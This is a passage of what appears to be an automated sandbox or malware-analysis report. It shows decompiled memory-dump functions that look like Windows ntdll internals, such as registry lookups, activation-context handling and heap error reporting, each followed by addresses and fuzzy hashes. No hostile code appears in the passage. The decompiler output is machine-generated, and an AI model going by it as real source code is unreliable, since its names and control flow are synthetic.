                        				signed int _t42;
                        				char* _t48;
                        				signed int _t59;
                        				signed char _t61;
                        				signed int* _t79;
                        				void* _t88;
                        
                        				_v28 = __edx;
                        				_t79 = __ecx;
                        				if(E02C607DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
                        					L13:
                        					_t35 = 0;
                        					L14:
                        					return _t35;
                        				}
                        				_t61 = __ecx[1];
                        				_t59 = __ecx[0xf];
                        				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
                        				_v36 = _a8 << 0xc;
                        				_t42 =  *(_t59 + 0xc) & 0x40000000;
                        				asm("sbb esi, esi");
                        				_t88 = ( ~_t42 & 0x0000003c) + 4;
                        				if(_t42 != 0) {
                        					_push(0);
                        					_push(0x14);
                        					_push( &_v24);
                        					_push(3);
                        					_push(_t59);
                        					_push(0xffffffff);
                        					if(E02BD9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
                        						_push(_t61);
                        						E02C5A80D(_t59, 1, _v20, 0);
                        						_t88 = 4;
                        					}
                        				}
                        				_t35 = E02C5A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
                        				if(_t35 < 0) {
                        					goto L14;
                        				}
                        				E02C61293(_t79, _v40, E02C607DF(_t79, _v28,  &_a4,  &_a8, 1));
                        				if(E02BB7D50() == 0) {
                        					_t48 = 0x7ffe0380;
                        				} else {
                        					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        				}
                        				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                        					E02C5138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
                        				}
                        				goto L13;
                        			}

















                        0x02c605c5
                        0x02c605ca
                        0x02c605d3
                        0x02c606db
                        0x02c606db
                        0x02c606dd
                        0x02c606e3
                        0x02c606e3
                        0x02c605dd
                        0x02c605e7
                        0x02c605f6
                        0x02c60600
                        0x02c60607
                        0x02c60610
                        0x02c60615
                        0x02c6061a
                        0x02c6061c
                        0x02c6061e
                        0x02c60624
                        0x02c60625
                        0x02c60627
                        0x02c60628
                        0x02c60631
                        0x02c60640
                        0x02c6064d
                        0x02c60654
                        0x02c60654
                        0x02c60631
                        0x02c6066d
                        0x02c60674
                        0x00000000
                        0x00000000
                        0x02c60692
                        0x02c6069e
                        0x02c606b0
                        0x02c606a0
                        0x02c606a9
                        0x02c606a9
                        0x02c606b8
                        0x02c606d6
                        0x02c606d6
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID: `
                        • API String ID: 0-2679148245
                        • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                        • Instruction ID: d0ca278da43354fa9e07292b9ff5c806c898dc4405aba50fdd9d1ba07f30eca8
                        • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                        • Instruction Fuzzy Hash: DB31F3322003556BE710DE25CD89FAB77D9BBC4758F044229FE58AB2C0D770EA04CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 72%
                        			E02C13884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                        				char _v8;
                        				intOrPtr _v12;
                        				intOrPtr* _v16;
                        				char* _v20;
                        				short _v22;
                        				char _v24;
                        				intOrPtr _t38;
                        				short _t40;
                        				short _t41;
                        				void* _t44;
                        				intOrPtr _t47;
                        				void* _t48;
                        
                        				_v16 = __edx;
                        				_t40 = 0x14;
                        				_v24 = _t40;
                        				_t41 = 0x16;
                        				_v22 = _t41;
                        				_t38 = 0;
                        				_v12 = __ecx;
                        				_push( &_v8);
                        				_push(0);
                        				_push(0);
                        				_push(2);
                        				_t43 =  &_v24;
                        				_v20 = L"BinaryName";
                        				_push( &_v24);
                        				_push(__ecx);
                        				_t47 = 0;
                        				_t48 = E02BD9650();
                        				if(_t48 >= 0) {
                        					_t48 = 0xc000090b;
                        				}
                        				if(_t48 != 0xc0000023) {
                        					_t44 = 0;
                        					L13:
                        					if(_t48 < 0) {
                        						L16:
                        						if(_t47 != 0) {
                        							L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                        						}
                        						L18:
                        						return _t48;
                        					}
                        					 *_v16 = _t38;
                        					 *_a4 = _t47;
                        					goto L18;
                        				}
                        				_t47 = L02BB4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                        				if(_t47 != 0) {
                        					_push( &_v8);
                        					_push(_v8);
                        					_push(_t47);
                        					_push(2);
                        					_push( &_v24);
                        					_push(_v12);
                        					_t48 = E02BD9650();
                        					if(_t48 < 0) {
                        						_t44 = 0;
                        						goto L16;
                        					}
                        					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                        						_t48 = 0xc000090b;
                        					}
                        					_t44 = 0;
                        					if(_t48 < 0) {
                        						goto L16;
                        					} else {
                        						_t17 = _t47 + 0xc; // 0xc
                        						_t38 = _t17;
                        						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                        							_t48 = 0xc000090b;
                        						}
                        						goto L13;
                        					}
                        				}
                        				_t48 = _t48 + 0xfffffff4;
                        				goto L18;
                        			}















                        0x02c13893
                        0x02c13896
                        0x02c13899
                        0x02c1389f
                        0x02c138a0
                        0x02c138a4
                        0x02c138a9
                        0x02c138ac
                        0x02c138ad
                        0x02c138ae
                        0x02c138af
                        0x02c138b1
                        0x02c138b4
                        0x02c138bb
                        0x02c138bc
                        0x02c138bd
                        0x02c138c4
                        0x02c138c8
                        0x02c138ca
                        0x02c138ca
                        0x02c138d5
                        0x02c1393e
                        0x02c13940
                        0x02c13942
                        0x02c13952
                        0x02c13954
                        0x02c13961
                        0x02c13961
                        0x02c13967
                        0x02c1396e
                        0x02c1396e
                        0x02c13947
                        0x02c1394c
                        0x00000000
                        0x02c1394c
                        0x02c138ea
                        0x02c138ee
                        0x02c138f8
                        0x02c138f9
                        0x02c138ff
                        0x02c13900
                        0x02c13902
                        0x02c13903
                        0x02c1390b
                        0x02c1390f
                        0x02c13950
                        0x00000000
                        0x02c13950
                        0x02c13915
                        0x02c1391d
                        0x02c1391d
                        0x02c13922
                        0x02c13926
                        0x00000000
                        0x02c13928
                        0x02c1392b
                        0x02c1392b
                        0x02c13935
                        0x02c13937
                        0x02c13937
                        0x00000000
                        0x02c13935
                        0x02c13926
                        0x02c138f0
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID: BinaryName
                        • API String ID: 0-215506332
                        • Opcode ID: 057935cd374518e6a852a5230cb78b93925ac1756765f597ea809147fa130146
                        • Instruction ID: b5aad01fce291e5caeebe4f7f7ed676ae014de8d2664a534915092b2f06238a4
                        • Opcode Fuzzy Hash: 057935cd374518e6a852a5230cb78b93925ac1756765f597ea809147fa130146
                        • Instruction Fuzzy Hash: 0D31F172900589AFEB15DA59C946EBBB774EF82B28F0141E9ED14A7240D7309E01DBE0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 33%
                        			E02BCD294(void* __ecx, char __edx, void* __eflags) {
                        				signed int _v8;
                        				char _v52;
                        				signed int _v56;
                        				signed int _v60;
                        				intOrPtr _v64;
                        				char* _v68;
                        				intOrPtr _v72;
                        				char _v76;
                        				signed int _v84;
                        				intOrPtr _v88;
                        				char _v92;
                        				intOrPtr _v96;
                        				intOrPtr _v100;
                        				char _v104;
                        				char _v105;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed int _t35;
                        				char _t38;
                        				signed int _t40;
                        				signed int _t44;
                        				signed int _t52;
                        				void* _t53;
                        				void* _t55;
                        				void* _t61;
                        				intOrPtr _t62;
                        				void* _t64;
                        				signed int _t65;
                        				signed int _t66;
                        
                        				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                        				_v8 =  *0x2c8d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                        				_v105 = __edx;
                        				_push( &_v92);
                        				_t52 = 0;
                        				_push(0);
                        				_push(0);
                        				_push( &_v104);
                        				_push(0);
                        				_t59 = __ecx;
                        				_t55 = 2;
                        				if(E02BB4120(_t55, __ecx) < 0) {
                        					_t35 = 0;
                        					L8:
                        					_pop(_t61);
                        					_pop(_t64);
                        					_pop(_t53);
                        					return E02BDB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                        				}
                        				_v96 = _v100;
                        				_t38 = _v92;
                        				if(_t38 != 0) {
                        					_v104 = _t38;
                        					_v100 = _v88;
                        					_t40 = _v84;
                        				} else {
                        					_t40 = 0;
                        				}
                        				_v72 = _t40;
                        				_v68 =  &_v104;
                        				_push( &_v52);
                        				_v76 = 0x18;
                        				_push( &_v76);
                        				_v64 = 0x40;
                        				_v60 = _t52;
                        				_v56 = _t52;
                        				_t44 = E02BD98D0();
                        				_t62 = _v88;
                        				_t65 = _t44;
                        				if(_t62 != 0) {
                        					asm("lock xadd [edi], eax");
                        					if((_t44 | 0xffffffff) != 0) {
                        						goto L4;
                        					}
                        					_push( *((intOrPtr*)(_t62 + 4)));
                        					E02BD95D0();
                        					L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                        					goto L4;
                        				} else {
                        					L4:
                        					L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                        					if(_t65 >= 0) {
                        						_t52 = 1;
                        					} else {
                        						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                        							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                        						}
                        					}
                        					_t35 = _t52;
                        					goto L8;
                        				}
                        			}

































                        0x02bcd29c
                        0x02bcd2a6
                        0x02bcd2b1
                        0x02bcd2b5
                        0x02bcd2b6
                        0x02bcd2bc
                        0x02bcd2bd
                        0x02bcd2be
                        0x02bcd2bf
                        0x02bcd2c2
                        0x02bcd2c4
                        0x02bcd2cc
                        0x02bcd384
                        0x02bcd34b
                        0x02bcd34f
                        0x02bcd350
                        0x02bcd351
                        0x02bcd35c
                        0x02bcd35c
                        0x02bcd2d6
                        0x02bcd2da
                        0x02bcd2e1
                        0x02bcd361
                        0x02bcd369
                        0x02bcd36d
                        0x02bcd2e3
                        0x02bcd2e3
                        0x02bcd2e3
                        0x02bcd2e5
                        0x02bcd2ed
                        0x02bcd2f5
                        0x02bcd2fa
                        0x02bcd302
                        0x02bcd303
                        0x02bcd30b
                        0x02bcd30f
                        0x02bcd313
                        0x02bcd318
                        0x02bcd31c
                        0x02bcd320
                        0x02bcd379
                        0x02bcd37d
                        0x00000000
                        0x00000000
                        0x02c0affe
                        0x02c0b001
                        0x02c0b011
                        0x00000000
                        0x02bcd322
                        0x02bcd322
                        0x02bcd330
                        0x02bcd337
                        0x02bcd35d
                        0x02bcd339
                        0x02bcd33f
                        0x02bcd38c
                        0x02bcd38c
                        0x02bcd33f
                        0x02bcd349
                        0x00000000
                        0x02bcd349

                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID: @
                        • API String ID: 0-2766056989
                        • Opcode ID: 423e0aafaa884fccfad363e5aa6117873673e373e26eca28ac6cb9b8ffedc78b
                        • Instruction ID: 8b1244ce463b622cd68759db2a4dbbf2f89c2a3ee431cb7e104f218e58bc64a5
                        • Opcode Fuzzy Hash: 423e0aafaa884fccfad363e5aa6117873673e373e26eca28ac6cb9b8ffedc78b
                        • Instruction Fuzzy Hash: 343190B65087469FC711DF28C980AABBBE8EBC5754F1049AEF99483250E734DD04CBA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 72%
                        			E02BA1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                        				intOrPtr _v8;
                        				char _v16;
                        				intOrPtr* _t26;
                        				intOrPtr _t29;
                        				void* _t30;
                        				signed int _t31;
                        
                        				_t27 = __ecx;
                        				_t29 = __edx;
                        				_t31 = 0;
                        				_v8 = __edx;
                        				if(__edx == 0) {
                        					L18:
                        					_t30 = 0xc000000d;
                        					goto L12;
                        				} else {
                        					_t26 = _a4;
                        					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                        						goto L18;
                        					} else {
                        						E02BDBB40(__ecx,  &_v16, __ecx);
                        						_push(_t26);
                        						_push(0);
                        						_push(0);
                        						_push(_t29);
                        						_push( &_v16);
                        						_t30 = E02BDA9B0();
                        						if(_t30 >= 0) {
                        							_t19 =  *_t26;
                        							if( *_t26 != 0) {
                        								goto L7;
                        							} else {
                        								 *_a8 =  *_a8 & 0;
                        							}
                        						} else {
                        							if(_t30 != 0xc0000023) {
                        								L9:
                        								_push(_t26);
                        								_push( *_t26);
                        								_push(_t31);
                        								_push(_v8);
                        								_push( &_v16);
                        								_t30 = E02BDA9B0();
                        								if(_t30 < 0) {
                        									L12:
                        									if(_t31 != 0) {
                        										L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                        									}
                        								} else {
                        									 *_a8 = _t31;
                        								}
                        							} else {
                        								_t19 =  *_t26;
                        								if( *_t26 == 0) {
                        									_t31 = 0;
                        								} else {
                        									L7:
                        									_t31 = L02BB4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                        								}
                        								if(_t31 == 0) {
                        									_t30 = 0xc0000017;
                        								} else {
                        									goto L9;
                        								}
                        							}
                        						}
                        					}
                        				}
                        				return _t30;
                        			}









                        0x02ba1b8f
                        0x02ba1b9a
                        0x02ba1b9c
                        0x02ba1b9e
                        0x02ba1ba3
                        0x02bf7010
                        0x02bf7010
                        0x00000000
                        0x02ba1ba9
                        0x02ba1ba9
                        0x02ba1bae
                        0x00000000
                        0x02ba1bc5
                        0x02ba1bca
                        0x02ba1bcf
                        0x02ba1bd0
                        0x02ba1bd1
                        0x02ba1bd2
                        0x02ba1bd6
                        0x02ba1bdc
                        0x02ba1be0
                        0x02bf6ffc
                        0x02bf7000
                        0x00000000
                        0x02bf7006
                        0x02bf7009
                        0x02bf7009
                        0x02ba1be6
                        0x02ba1bec
                        0x02ba1c0b
                        0x02ba1c0b
                        0x02ba1c0c
                        0x02ba1c11
                        0x02ba1c12
                        0x02ba1c15
                        0x02ba1c1b
                        0x02ba1c1f
                        0x02ba1c31
                        0x02ba1c33
                        0x02bf7026
                        0x02bf7026
                        0x02ba1c21
                        0x02ba1c24
                        0x02ba1c24
                        0x02ba1bee
                        0x02ba1bee
                        0x02ba1bf2
                        0x02ba1c3a
                        0x02ba1bf4
                        0x02ba1bf4
                        0x02ba1c05
                        0x02ba1c05
                        0x02ba1c09
                        0x02ba1c3e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02ba1c09
                        0x02ba1bec
                        0x02ba1be0
                        0x02ba1bae
                        0x02ba1c2e

                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID: WindowsExcludedProcs
                        • API String ID: 0-3583428290
                        • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                        • Instruction ID: 23c3afc3a48822c2cc9d3bc8f1b0b32db0368a153c511e3bc306b6f2b2ae343b
                        • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                        • Instruction Fuzzy Hash: 6F21C876515128ABCB619A5DC850FABB76DEF41654F0544E5FE089F200EB34DD04EBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02BBF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                        				intOrPtr _t13;
                        				intOrPtr _t14;
                        				signed int _t16;
                        				signed char _t17;
                        				intOrPtr _t19;
                        				intOrPtr _t21;
                        				intOrPtr _t23;
                        				intOrPtr* _t25;
                        
                        				_t25 = _a8;
                        				_t17 = __ecx;
                        				if(_t25 == 0) {
                        					_t19 = 0xc00000f2;
                        					L8:
                        					return _t19;
                        				}
                        				if((__ecx & 0xfffffffe) != 0) {
                        					_t19 = 0xc00000ef;
                        					goto L8;
                        				}
                        				_t19 = 0;
                        				 *_t25 = 0;
                        				_t21 = 0;
                        				_t23 = "Actx ";
                        				if(__edx != 0) {
                        					if(__edx == 0xfffffffc) {
                        						L21:
                        						_t21 = 0x200;
                        						L5:
                        						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
                        						 *_t25 = _t13;
                        						L6:
                        						if(_t13 == 0) {
                        							if((_t17 & 0x00000001) != 0) {
                        								 *_t25 = _t23;
                        							}
                        						}
                        						L7:
                        						goto L8;
                        					}
                        					if(__edx == 0xfffffffd) {
                        						 *_t25 = _t23;
                        						_t13 = _t23;
                        						goto L6;
                        					}
                        					_t13 =  *((intOrPtr*)(__edx + 0x10));
                        					 *_t25 = _t13;
                        					L14:
                        					if(_t21 == 0) {
                        						goto L6;
                        					}
                        					goto L5;
                        				}
                        				_t14 = _a4;
                        				if(_t14 != 0) {
                        					_t16 =  *(_t14 + 0x14) & 0x00000007;
                        					if(_t16 <= 1) {
                        						_t21 = 0x1f8;
                        						_t13 = 0;
                        						goto L14;
                        					}
                        					if(_t16 == 2) {
                        						goto L21;
                        					}
                        					if(_t16 != 4) {
                        						_t19 = 0xc00000f0;
                        						goto L7;
                        					}
                        					_t13 = 0;
                        					goto L6;
                        				} else {
                        					_t21 = 0x1f8;
                        					goto L5;
                        				}
                        			}











                        0x02bbf71d
                        0x02bbf722
                        0x02bbf726
                        0x02c04770
                        0x02bbf765
                        0x02bbf769
                        0x02bbf769
                        0x02bbf732
                        0x02c0477a
                        0x00000000
                        0x02c0477a
                        0x02bbf738
                        0x02bbf73a
                        0x02bbf73c
                        0x02bbf73f
                        0x02bbf746
                        0x02bbf778
                        0x02bbf7a9
                        0x02bbf7a9
                        0x02bbf754
                        0x02bbf75a
                        0x02bbf75d
                        0x02bbf75f
                        0x02bbf761
                        0x02bbf76f
                        0x02bbf771
                        0x02bbf771
                        0x02bbf76f
                        0x02bbf763
                        0x00000000
                        0x02bbf763
                        0x02bbf77d
                        0x02bbf7a3
                        0x02bbf7a5
                        0x00000000
                        0x02bbf7a5
                        0x02bbf77f
                        0x02bbf782
                        0x02bbf784
                        0x02bbf786
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02bbf788
                        0x02bbf748
                        0x02bbf74d
                        0x02bbf78d
                        0x02bbf793
                        0x02bbf7b7
                        0x02bbf7bc
                        0x00000000
                        0x02bbf7bc
                        0x02bbf798
                        0x00000000
                        0x00000000
                        0x02bbf79d
                        0x02bbf7b0
                        0x00000000
                        0x02bbf7b0
                        0x02bbf79f
                        0x00000000
                        0x02bbf74f
                        0x02bbf74f
                        0x00000000
                        0x02bbf74f

                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID: Actx
                        • API String ID: 0-89312691
                        • Opcode ID: db5f08e3ee5b84ca24c560f066b4f738c0b7a93876aba0e29ef88c7e519e1995
                        • Instruction ID: 88809c0beb19a438d8bc6cf3eb5de13b551c405bdd29f4ce6e4823a2fd304763
                        • Opcode Fuzzy Hash: db5f08e3ee5b84ca24c560f066b4f738c0b7a93876aba0e29ef88c7e519e1995
                        • Instruction Fuzzy Hash: 6F118E353046029BEB2A4E1FCC907B67295EF96668F2445EAF861CBF91DBF0D840C380
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 71%
                        			E02C48DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                        				intOrPtr _t35;
                        				void* _t41;
                        
                        				_t40 = __esi;
                        				_t39 = __edi;
                        				_t38 = __edx;
                        				_t35 = __ecx;
                        				_t34 = __ebx;
                        				_push(0x74);
                        				_push(0x2c70d50);
                        				E02BED0E8(__ebx, __edi, __esi);
                        				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                        				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                        				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                        					E02C25720(0x65, 0, "Critical error detected %lx\n", _t35);
                        					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                        						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                        						asm("int3");
                        						 *(_t41 - 4) = 0xfffffffe;
                        					}
                        				}
                        				 *(_t41 - 4) = 1;
                        				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                        				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                        				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                        				 *((intOrPtr*)(_t41 - 0x64)) = L02BEDEF0;
                        				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                        				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                        				_push(_t41 - 0x70);
                        				L02BEDEF0(1, _t38);
                        				 *(_t41 - 4) = 0xfffffffe;
                        				return E02BED130(_t34, _t39, _t40);
                        			}





                        0x02c48df1
                        0x02c48df1
                        0x02c48df1
                        0x02c48df1
                        0x02c48df1
                        0x02c48df1
                        0x02c48df3
                        0x02c48df8
                        0x02c48dfd
                        0x02c48e00
                        0x02c48e0e
                        0x02c48e2a
                        0x02c48e36
                        0x02c48e38
                        0x02c48e3c
                        0x02c48e46
                        0x02c48e46
                        0x02c48e36
                        0x02c48e50
                        0x02c48e56
                        0x02c48e59
                        0x02c48e5c
                        0x02c48e60
                        0x02c48e67
                        0x02c48e6d
                        0x02c48e73
                        0x02c48e74
                        0x02c48eb1
                        0x02c48ebd

                        Strings
                        • Critical error detected %lx, xrefs: 02C48E21
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID: Critical error detected %lx
                        • API String ID: 0-802127002
                        • Opcode ID: 395c61300d71ccbc2d46d1e92574734876a15ac6e1c297564e684faab7c1cc5d
                        • Instruction ID: 591baf2f1247076efce493a4be6354227a3d834a23f24adf176fda5cadff3fc7
                        • Opcode Fuzzy Hash: 395c61300d71ccbc2d46d1e92574734876a15ac6e1c297564e684faab7c1cc5d
                        • Instruction Fuzzy Hash: 7911AD75D10388EBDF24DFA489057EEBBB5BB04714F20429ED42AAB292C7744601CF14
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 02C2FF60
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                        • API String ID: 0-1911121157
                        • Opcode ID: 91bedc402c757fa23b3e44571f81ac785afe0e78ca36faeab6df31ec8fc47dab
                        • Instruction ID: 0d80b6df0a976a8ddd43729ac9f242c8fd413b4b73b273f106c6fd1fc4204345
                        • Opcode Fuzzy Hash: 91bedc402c757fa23b3e44571f81ac785afe0e78ca36faeab6df31ec8fc47dab
                        • Instruction Fuzzy Hash: B7110471950158EFEF11EB50CD48F98B7F2FF48708F148098F5099B561CB799A44CB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 88%
                        			E02C65BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                        				signed int _t296;
                        				signed char _t298;
                        				signed int _t301;
                        				signed int _t306;
                        				signed int _t310;
                        				signed char _t311;
                        				intOrPtr _t312;
                        				signed int _t313;
                        				void* _t327;
                        				signed int _t328;
                        				intOrPtr _t329;
                        				intOrPtr _t333;
                        				signed char _t334;
                        				signed int _t336;
                        				void* _t339;
                        				signed int _t340;
                        				signed int _t356;
                        				signed int _t362;
                        				short _t367;
                        				short _t368;
                        				short _t373;
                        				signed int _t380;
                        				void* _t382;
                        				short _t385;
                        				signed short _t392;
                        				signed char _t393;
                        				signed int _t395;
                        				signed char _t397;
                        				signed int _t398;
                        				signed short _t402;
                        				void* _t406;
                        				signed int _t412;
                        				signed char _t414;
                        				signed short _t416;
                        				signed int _t421;
                        				signed char _t427;
                        				intOrPtr _t434;
                        				signed char _t435;
                        				signed int _t436;
                        				signed int _t442;
                        				signed int _t446;
                        				signed int _t447;
                        				signed int _t451;
                        				signed int _t453;
                        				signed int _t454;
                        				signed int _t455;
                        				intOrPtr _t456;
                        				intOrPtr* _t457;
                        				short _t458;
                        				signed short _t462;
                        				signed int _t469;
                        				intOrPtr* _t474;
                        				signed int _t475;
                        				signed int _t479;
                        				signed int _t480;
                        				signed int _t481;
                        				short _t485;
                        				signed int _t491;
                        				signed int* _t494;
                        				signed int _t498;
                        				signed int _t505;
                        				intOrPtr _t506;
                        				signed short _t508;
                        				signed int _t511;
                        				void* _t517;
                        				signed int _t519;
                        				signed int _t522;
                        				void* _t523;
                        				signed int _t524;
                        				void* _t528;
                        				signed int _t529;
                        
                        				_push(0xd4);
                        				_push(0x2c71178);
                        				E02BED0E8(__ebx, __edi, __esi);
                        				_t494 = __edx;
                        				 *(_t528 - 0xcc) = __edx;
                        				_t511 = __ecx;
                        				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
                        				 *(_t528 - 0xbc) = __ecx;
                        				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
                        				_t434 =  *((intOrPtr*)(_t528 + 0x24));
                        				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
                        				_t427 = 0;
                        				 *(_t528 - 0x74) = 0;
                        				 *(_t528 - 0x9c) = 0;
                        				 *(_t528 - 0x84) = 0;
                        				 *(_t528 - 0xac) = 0;
                        				 *(_t528 - 0x88) = 0;
                        				 *(_t528 - 0xa8) = 0;
                        				 *((intOrPtr*)(_t434 + 0x40)) = 0;
                        				if( *(_t528 + 0x1c) <= 0x80) {
                        					__eflags =  *(__ecx + 0xc0) & 0x00000004;
                        					if(__eflags != 0) {
                        						_t421 = E02C64C56(0, __edx, __ecx, __eflags);
                        						__eflags = _t421;
                        						if(_t421 != 0) {
                        							 *((intOrPtr*)(_t528 - 4)) = 0;
                        							E02BDD000(0x410);
                        							 *(_t528 - 0x18) = _t529;
                        							 *(_t528 - 0x9c) = _t529;
                        							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
                        							E02C65542(_t528 - 0x9c, _t528 - 0x84);
                        						}
                        					}
                        					_t435 = _t427;
                        					 *(_t528 - 0xd0) = _t435;
                        					_t474 = _t511 + 0x65;
                        					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                        					_t511 = 0x18;
                        					while(1) {
                        						 *(_t528 - 0xa0) = _t427;
                        						 *(_t528 - 0xbc) = _t427;
                        						 *(_t528 - 0x80) = _t427;
                        						 *(_t528 - 0x78) = 0x50;
                        						 *(_t528 - 0x79) = _t427;
                        						 *(_t528 - 0x7a) = _t427;
                        						 *(_t528 - 0x8c) = _t427;
                        						 *(_t528 - 0x98) = _t427;
                        						 *(_t528 - 0x90) = _t427;
                        						 *(_t528 - 0xb0) = _t427;
                        						 *(_t528 - 0xb8) = _t427;
                        						_t296 = 1 << _t435;
                        						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
                        						__eflags = _t436 & _t296;
                        						if((_t436 & _t296) != 0) {
                        							goto L92;
                        						}
                        						__eflags =  *((char*)(_t474 - 1));
                        						if( *((char*)(_t474 - 1)) == 0) {
                        							goto L92;
                        						}
                        						_t301 =  *_t474;
                        						__eflags = _t494[1] - _t301;
